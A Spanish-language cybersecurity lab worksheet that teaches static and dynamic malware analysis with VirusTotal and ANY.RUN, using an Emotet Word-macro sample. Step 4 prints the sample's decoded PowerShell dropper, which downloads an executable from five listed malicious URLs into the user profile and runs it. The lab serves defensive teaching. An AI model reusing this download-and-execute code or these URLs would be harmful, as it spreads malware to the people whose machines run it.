Lab - Herramientas de investigación de malware en línea

Objetivos

Parte 1: Realizar análisis de malware estático

Parte 2: Realizar un análisis dinámico de malware

Part 3: Investigar el Exploit

Introducción

Hay muchas herramientas de análisis de malware disponibles en línea. Estas herramientas proporcionan funciones de referencia y análisis. Por ejemplo, puede enviar indicadores de riesgo (IOC), como hash de archivo, URL o direcciones IP, y la herramienta buscará el IOC y devolverá información sobre ataques que compartan estas características. También se pueden enviar archivos sospechosos. El análisis estático de malware puede enviar el archivo a una colección de programas antivirus y devolver los resultados. También se pueden realizar análisis adicionales diseccionando los archivos a nivel binario. Los sandboxes en línea realizarán un análisis dinámico de malware en el que la vulnerabilidad de malware se ejecuta de la misma manera que infecta un equipo host vulnerable. Esto se logra mediante la ejecución del malware en una máquina virtual con herramientas especiales que monitorean el comportamiento del malware. Esto se conoce como sandbox de malware.

El análisis dinámico de malware proporciona información valiosa sobre el comportamiento del malware y los artefactos que crea. Esta información se puede utilizar para identificar versiones nuevas o actualizadas de malware, evaluar los efectos de una infección y descubrir más vulnerabilidades. Por ejemplo, parte del malware se utiliza como servicio de distribución para otros ataques de malware. El malware de servicio de entrega puede identificarse, pero el malware que ha distribuido puede no serlo. El análisis dinámico puede revelar lo que se entregó y la vulnerabilidad se puede investigar más a fondo. En esta práctica de laboratorio, utilizará dos herramientas de investigación de malware en línea para obtener información sobre una vulnerabilidad.

Situación

Usted trabaja en XYZ, Inc. como técnico cibernético. Se le ha pedido que ayude a un analista de ciberseguridad a evaluar las alertas de seguridad generadas por su sistema de prevención de intrusiones (IPS). El IPS ha marcado una serie de eventos como potencialmente maliciosos. El analista le ha proporcionado un grupo de IOC potenciales para investigar. Está utilizando dos herramientas en línea para realizar análisis estáticos y dinámicos basados en los IOC. Si bien es posible enviar archivos de malware también, el analista considera que es mejor que use los IOC hasta que tenga más experiencia en el manejo de archivos de malware reales.

Recursos necesarios

=    1 computadora con acceso a Internet

= CSE-LABVM

Instrucciones, Parte 1: Realizar un análisis de malware estático

En esta parte, enviará un hash de archivo a un servicio en línea que buscará el hash y devolverá información sobre el archivo de malware asociado. El hash de archivo es una representación computarizada, o huella digital, de un archivo. Los hash son únicos y extremadamente difíciles de duplicar.

Paso 1: envíe el hash.

En este paso, enviará el valor hash a una herramienta de análisis de malware estático que le proporcionará más información sobre el archivo de malware si la herramienta lo conoce.

a.Inicie     CSE-LABVM.

b.Abra un navegador web y navegue hasta el sitio de VirusTotal.

c.El hash de archivo que ha recibido es:

05383088d0d46a5b5f4de852703601a6c39f04844ab63a1850197fcb011f3c81

Seleccione y copie el valor hash. Haga clic en la entrada de búsqueda en el menú de VirusTotal y pegue el hash en el cuadro de búsqueda. Presione la tecla Enter para ejecutar la búsqueda.

d.VirusTotal tiene información para el archivo, lo que significa que un archivo con el mismo hash se envió previamente para su análisis. Verá los resultados del análisis.

Preguntas:

¿Ha ingresado el malware a la red de XYZ, Inc.?

En su trabajo, ¿qué debe hacer ahora?

Paso 2: interpretar la información total del virus.

a.VirusTotal envía archivos que el público ha cargado a varios agentes antivirus para su análisis. En este caso, se ha sometido a 63 productos antivirus.

Pregunta:

¿Cuántos de los productos antivirus marcaron el archivo como malicioso? ¿Qué le dice esto sobre la confiabilidad de los programas antivirus?

b.Seleccione la ficha Detalles. Aquí puede obtener más información sobre el archivo. Revise la información proporcionada. Tenga en cuenta que parte de esta información puede no ser precisa y requerir confirmación con otros sitios.

Pregunta:

¿A qué tipo de archivo se ha identificado el malware?

c.Cambie a la ficha Relaciones. Aquí puede ver los IOC, como las direcciones IP, los sitios web y los dominios con los que el malware intentó ponerse en contacto. También verá los hash para los archivos que creó o descargó de esos dominios. Además, puede ver los archivos y procesos relacionados con la ejecución del malware en la computadora host.

Pregunta:

¿Cuál es el primer dominio al que el malware realiza una solicitud HTTP?

d.Cambie a la ficha Comportamiento. Revise la información disponible aquí. Debajo de la barra de menú hay una lista desplegable que le permite seleccionar información de diferentes entornos limitados de malware. Despliegue la lista y seleccione VMRay si aún no está seleccionada.

El malware utiliza comandos de shell para abrir programas y procesos. Busque la información sobre los comandos de shell que se ejecutan durante el ataque. Este malware abre MS Windows PowerShell y le asigna un valor.

Pregunta:

¿Qué tiene de inusual ese valor?

e.Haz clic     en la pestaña Comunidad. Mire las dos presentaciones de Thor. Estas son firmas de YARA representadas por el escáner THOR APT, una herramienta de evaluación de riesgos de Nextron Systems. Revise las firmas. No necesita comprender todo lo que contienen.

Preguntas:

¿Qué son las firmas de YARA?

De los campos de descripción en las firmas de YARA, ¿qué puede aprender sobre cómo el malware utiliza PowerShell?

Parte 2: Realizar un análisis dinámico de malware

Ahora utilizaremos otra herramienta para revisar los resultados de un análisis dinámico en un archivo de malware enviado por la comunidad. ANY.RUN es una empresa que ofrece un entorno exclusivo, dinámico e interactivo en línea. ANY.RUN ofrece un servicio gratuito en el que los usuarios de la comunidad pueden cargar archivos sospechosos de malware para su análisis. Proporciona un conjunto muy completo de análisis que permiten ver el comportamiento del malware. Los suscriptores de la versión completa de ANY.RUN pueden ejecutar el malware en una máquina virtual e interactuar con el malware si se requieren acciones del usuario para activarlo. Los usuarios gratuitos solo pueden ejecutar muestras de malware en una máquina virtual con Windows 7 de 32 bits; sin embargo, los suscriptores de pago pueden elegir el sistema operativo que se adapte a su entorno.

El sandbox ANY.RUN ejecutará dinámicamente el malware y mostrará detalles de lo que hace el malware en la interfaz de análisis. Los usuarios que pagan también pueden interactuar con la VM de sandbox en la que se ejecuta el malware. Pueden responder a las indicaciones del malware e inspeccionar el sistema operativo infectado.

Al igual que VirusTotal, puede buscar IOC para ver los resultados de análisis dinámicos o interactivos completados anteriormente. En esta parte del laboratorio, enviaremos el mismo hash de archivo a ANY.RUN y revisaremos los resultados.

Paso 1: Acceda a ANY.RUN y envíe el IOC

a.En     navegador web, acceda a ANY.RUN. Haga clic en Servicio en el menú horizontal para ir a la interfaz de servicio de sandbox.

b.ANY.RUN proporciona un tablero en tiempo real del panorama actual de amenazas de malware con estadísticas sobre la distribución de amenazas de malware y la proporción de envíos recientes que se han determinado como maliciosos, sospechosos o sin amenazas. Al hacer clic en uno de los países del mapa, se mostrará la lista de envíos públicos de ese país. Los usuarios de la comunidad pueden ver un análisis detallado de cada envío. Familiarícese con este tablero.

Paso 2: envíe el COI y revise los resultados

a.Para buscar las tareas públicas para nuestro IOC, haga clic en Tareas públicas en el menú de la izquierda.

b.Aquí puede ver la lista de tareas públicas a las que se puede acceder. Están ordenados por envío más reciente. Las tareas se etiquetan con el veredicto de análisis. Se confirma que algunos son malware y otros son archivos benignos y otros son sospechosos.

c.Pegue el hash de la Parte 1 en el cuadro de búsqueda en la parte superior derecha de la ventana y presione Intro.

d.Verá una página de ataques de malware que tienen un artefacto que corresponde al valor hash.

Pregunta:

Desplácese por la lista de envíos públicos. ¿Cuál es el nombre del archivo que corresponde al hash? ¿Hay solo uno?

e.Busque la entrada con fecha del 1 de junio de 2019 para el archivo Data-5544-J5823545.doc. Haga clic en esa entrada.

Nota: ANY.RUN ejecuta el malware en su sandbox. A veces, el malware no se ejecuta por completo, por lo que algunos envíos no incluirán detalles de toda la vulnerabilidad. Por ejemplo, si se requiere acceso a un servidor de comando y control (CnC o C 2) en Internet, es posible que el servidor no esté disponible. Si ese es el caso, el ataque puede dejar de ejecutarse antes de alcanzar su objetivo. Por este motivo, es importante observar varias de las entradas en los resultados de búsqueda para encontrar una que parezca haberse ejecutado por completo.

Paso 3: Explore la interfaz

La interfaz de análisis ANY.RUN proporciona información muy detallada de muchos aspectos del comportamiento del malware.

a.El escritorio de la computadora que se muestra consta de una serie de capturas de pantalla del escritorio de la computadora en diferentes etapas del proceso de infección de malware. Pase el mouse sobre la imagen y mueva el mouse hacia la derecha o hacia la izquierda para desplazarse por las capturas de pantalla. En muchos casos, no hay nada que ver porque el malware no muestra nada en la pantalla mientras funciona. A veces, si se requiere la entrada del usuario para ejecutar el malware, en lugar de una captura de pantalla, puede ver una película que captura las acciones del usuario que se realizaron como parte del proceso de infección de malware.

Pregunta:

Revise las pantallas de principio a fin. Por lo que ven en las pantallas, ¿cuál parece ser la primera parte del proceso de infección de virus?

b.En el lado derecho de la pantalla, verá un grupo de barras azules que se muestran en una estructura en forma de árbol anidada. Este es un árbol de procesos. Muestra todos los procesos de software que se utilizaron en el ataque. Algunos de ellos son componentes de software de Windows y otros son parte del malware.

c.Haga clic en el primer proceso en el árbol. La información sobre este proceso aparece debajo del árbol. Haga clic en el botón Más información para ver detalles adicionales del proceso.

Preguntas:

¿Qué proceso es este?

Mire la línea de comandos. ¿Qué archivo se pasó como argumento al comando que ejecuta MS Word?

¿Qué papel cree que desempeñó este archivo de documento en la vulnerabilidad de malware? No dude en buscar su respuesta en la Web.

Paso 4: Analizar una secuencia de comandos ofuscada

a.Cierre la ventana Más información haciendo clic en la "x" en la esquina superior derecha. Haga clic en el proceso inmediatamente debajo del proceso de MS Word. Haga clic en Más información para ver los detalles.

Preguntas:

¿Cuál es el nombre del proceso? ¿Cuál es su propósito?

PowerShell a menudo es utilizado por los agentes de amenazas en ataques de vivir fuera de la tierra (LotL). ¿Qué es un ataque de LotL y cómo PowerShell los habilita? Utilice Internet para buscar respuestas según sea necesario.

b.En la ventana de Detalles avanzados del proceso (más información), observe la entrada de la línea de comandos. Este es el comando emitido por la macro de malware en el documento de Word. Puede ver el comando de PowerShell y dos argumentos que se pasaron al comando, y luego la cadena larga que vimos

c.Copie la cadena con el icono de copia junto al encabezado Línea de comando.

d.Abra una terminal para guardar el texto copiado en un archivo de texto denominado text con el comando echo. El texto del nombre de archivo se utiliza como ejemplo para esta actividad.

cisco @ labvm: ~ $ echo “copied file content”> text

donde “contenido de texto copiado” es el comando de PowerShell.

e.Abra     el archivo con un editor de texto. Un editor de texto basado en GUI, Pluma, está disponible en esta VM.

f.En el archivo de texto, elimine la cadena, PowerShell -nop -e. Guarde y cierre el archivo.

g.En el terminal, utilice el comando base64 -d para decodificar los datos binarios como texto y la salida se canalizará a un nuevo archivo de texto, text_64. El nombre de archivo text_64 se utiliza como ejemplo para esta actividad.

cisco @ labvm: ~ $ cat text | base64 -d> text_64

h.En Pluma, abra el archivo text_ 64 y verá el decodificado a continuación, pero con un ajuste diferente según el tamaño de la ventana de terminal.

$ R3ZtKC = 'FCams3Q'; $ d1mU0azd = 184 '; $ XMzUsP =' PD2Qisza '; $ tZTLXzZq = $ env: userprofile +' \ '+ $ d1mU0azd +'. Exe '; $ zlBUq6 =' Q0HuEl ' 'n' + 'e' + 'w-objeto') nET.W`EbC`Li`Ent; $ NUzAMAR = 'http: //agavea.com.br/font/tMfyxzMEnQ/@http: // news-week .ru / 2018 / wvq6nzd_kywgcjzgi-273 / @ http: //ab.fitzio.com/cgi-bin/opiFtEAsf/@http: //palmbeachresortcebu.com/wp-content/uploads/t9smfqj3_blm4xo-69526194/@http: // thingsmadeforyouapps.com/wp-admin/VpVOXxek/'.SPLit('@');$NOBJJj='Eo1jszRQ';foreach($j5YzrQKQ in $ NUzAMAR) {try {$ pTl4Jz.DOwNlOADfiLe ($ j5YzzQT $ LX $ TZZZZQ SHHj3v = 'Mpi_Cz1s'; If ((. ('G' + 'et' + '- Item') $ tZTLXzZq) .LenGTh -ge 31421) {[Diagnostics.Process] :: sTarT ($ tZTLXzZq); $ s1EoklR = 'fL2dzmIj'; break; $ TQ0NStMF = 'mANFqY'} }atch {}} $ Zi7lBM = 'qFLbpU'

i.El texto sigue siendo un poco difícil de leer, pero probablemente pueda seleccionar algunas características familiares. Usaremos el editor de texto para facilitar la lectura.

1) Haga clic en Buscar> Reemplazar.

2) Ingrese; (punto y coma) en el campo Buscar.

3) Ingrese \ n en el campo Reemplazar por.

4) Seleccione la casilla de verificación Match regular express.

5) Haga clic en Reemplazar todo.

6) Por último, repita los pasos anteriores para @. La “@” se utiliza como separador para una declaración particularmente larga. Escriba @ en el campo Buscar y reemplácelo por \ n.

El código formateado debería tener este aspecto:

1 $ R3ZtKC = 'FCams3Q'

2 $ d1mU0azd = '184'

3 $ XMzUsP = 'PD2Qisza'

4 $ tZTLXzZq = $ env: userprofile + '\' + $ d1mU0azd + '. Exe'

5 $ zlBUq6 = 'Q0HuEwi'

6 $ pTl4Jz =. ('N' + 'e' + 'w-objeto') nET.W`EbC`Li`Ent

7 $ NUzAMAR = 'http: //agavea.com.br/font/tMfyxzMEnQ/

8 http: //news-week.ru/2018/wvq6nzd_kywgcjzgi-273/

9 http: //ab.fitzio.com/cgi-bin/opiFtEAsf/

10 http: //palmbeachresortcebu.com/wp-content/ cargas / t9smfqj3_blm4xo-69526194 /

11 http: //thingsmadeforyouapps.com/wp-admin/VpVOXxek/'.SPLit ('

12 ')

13 $ NOBJJj = 'Eo1jszRQ'

14 foreach ($ j5YzrQKQ en $ NUzAMAR) {prueba {$ pTl4Jz.DOwNlOADfiLe ($ j5YzrQKQ, $ tZTLXzZq)

15 $ SHHj3v = 'Mpi_Cz1s'

16 If ((. ('G' + 'et' + '- Item') $ tZTLXzZq) .LenGTh -ge 31421) {[Diagnostics.Process] :: sTarT ($ tZTLXzZq)

 17 $s1EoklR='fL2dzmIj'

18 descanso

19 $ TQ0NStMF = 'mANFqY'} }atch {}} $ Zi7lBM = 'qFLb

j.Guarde el archivo text_64 si lo desea.

Paso 5: Interpretar la secuencia de comandos de malware

Si bien el archivo sigue siendo difícil de leer porque utiliza grupos aleatorios de caracteres para nombres y valores de variables, y también intenta ofuscar comandos mediante el uso de mayúsculas erráticas y otros medios, un poco de conocimiento de programación puede ayudarlo a tener una idea de lo que es continuando.

a.Observe que una serie de URL aparecen en el código. Envíe varios de ellos a ANY.RUN, VirusTotal u otro servicio para ver si son maliciosos.

b.Tenga en cuenta que el nombre de la variable, $ tZTLXzZq, aparece en la línea cuatro del código anterior. Su valor se concatena con el texto '.exe'.

Preguntas:

¿Cuál es el valor asignado a $ tZTLXzZq en la línea 2?

Regrese a ANY.RUN. ¿Cuál es el siguiente proceso a continuación de Powershell?

c.Mire la línea 14. El comando es foreach ($ j5YzrQKQ en $ NUzAMAR).

Pregunta:

¿Cuál es el contenido de la variable $ NUzAMAR asignada en las líneas 8 - 11?

Paso 6: Vea los detalles de las conexiones de malware y las amenazas conocidas

a.Debajo de la vista de escritorio, hay una serie de fichas que proporcionan detalles del comportamiento del malware. La primera ficha muestra el comportamiento de la red y las amenazas conocidas. Haga clic en la ficha Solicitudes HTTP. Muestra los procesos que intentaron realizar conexiones a través de HTTP.

Nota: Aunque esté trabajando en una VM, no se recomienda que intente conectarse a ninguna de estas URL.

Preguntas:

¿Con qué URL se conectó Powershell.exe correctamente? Esto coincidirá con una de las URL de la función de ofuscación

¿Qué proceso comienza a emitir solicitudes a la Web?

El nuevo proceso intenta comunicarse con una serie de URL. ¿Desde qué URL descarga el proceso los archivos binarios?

b.   Haga clic en la pestañaConectar. Aquí puede ver una línea de tiempo de las conexiones realizadas durante el ataque de malware. En la ficha DNS, puede ver las solicitudes de DNS realizadas por el malware. Tenga en cuenta que puede descargar PCAP para las conexiones y las solicitudes de DNS. Estos archivos se pueden abrir en Wireshark para su posterior revisión.

c.Haga clic  en la pestaña Amenazas. Aquí verá los mensajes de alerta IPS de Suricata llamados identificadores de firma (SID). Estas alertas son activadas por diversos comportamientos de malware según lo detectan las reglas de IDS / IPS. Estos mensajes son utilizados por varias plataformas de monitoreo de seguridad de la red.

Part 3: Investigar el Exploit

Hemos investigado una serie de características de este ataque, pero no hemos aprendido mucho sobre el ataque en sí. ANY.RUN mantiene una enciclopedia de malware llamada Tracker. Si existe un artículo de Tracker para la muestra de malware, ANY.RUN enlazará con el artículo.

Nota: Es posible que deba registrarse para obtener una cuenta en Any.Run para ver algunas de las funciones analizadas en esta parte.

a.En el panel del signo de la derecha de la interfaz, en la parte superior, hay un encabezado que proporciona información sobre el malware, incluido el hash MD5 para el archivo, el tiempo que llevó ejecutar el ataque en el sandbox y una serie de etiquetas. Si hace clic en una etiqueta, se lo dirigirá a una búsqueda de tareas que enumerará todos los ataques enviados que compartan esa etiqueta.

b.Debajo de las etiquetas hay varios botones. Haga clic en IOC para ver todos los IOC del malware enviado. Estos IOC son diagnósticos para el ataque. Encontrar cualquiera de ellos en los datos de monitoreo de la red puede indicar una vulnerabilidad.

c.Por último, debajo de las etiquetas hay un enlace a Tracker. Como se indicó, se conoce el ataque de malware y Emotet. Haga clic en el enlace para leer sobre Emotet y responder las preguntas a continuación.

Preguntas:

¿Qué tipo de malware es Emotet y cuáles son sus principales funciones?

Emotet muestra polimorfismo. ¿Qué significa esto?

¿Cuál es el vector de ataque que propaga el malware a las posibles víctimas?

¿Qué deben saber los usuarios para evitar infectar sus equipos (y otros hosts en la red) con Emotet?

d.Regrese a la página de análisis de la variante de malware Emotet con la que hemos estado trabajando. Debajo del nombre del archivo de malware, verá una serie de etiquetas. Haga clic en la etiqueta Emotet. Esto ejecutará una búsqueda de otro malware que se haya identificado como Emotet. Haga clic en varios de los informes de envío público hasta encontrar varios que parecen haberse ejecutado correctamente en el sandbox. Debería ver una serie de solicitudes HTTP que se produjeron durante el proceso de infección.

Pregunta:

¿Qué ve que es diferente en estas presentaciones del informe que analizamos?

Preguntas de reflexión

1.Ha obtenido una perspectiva significativa de la manera en que funciona un ataque sofisticado de malware. ¿Qué ha aprendido sobre tales ataques en general (no necesariamente Emotet específicamente)?

2.Conéctese e investigue otras aplicaciones de sandbox, tanto herramientas en línea como de ejecución local. Describa otras herramientas y lo que hacen. Escriba sus respuestas aquí.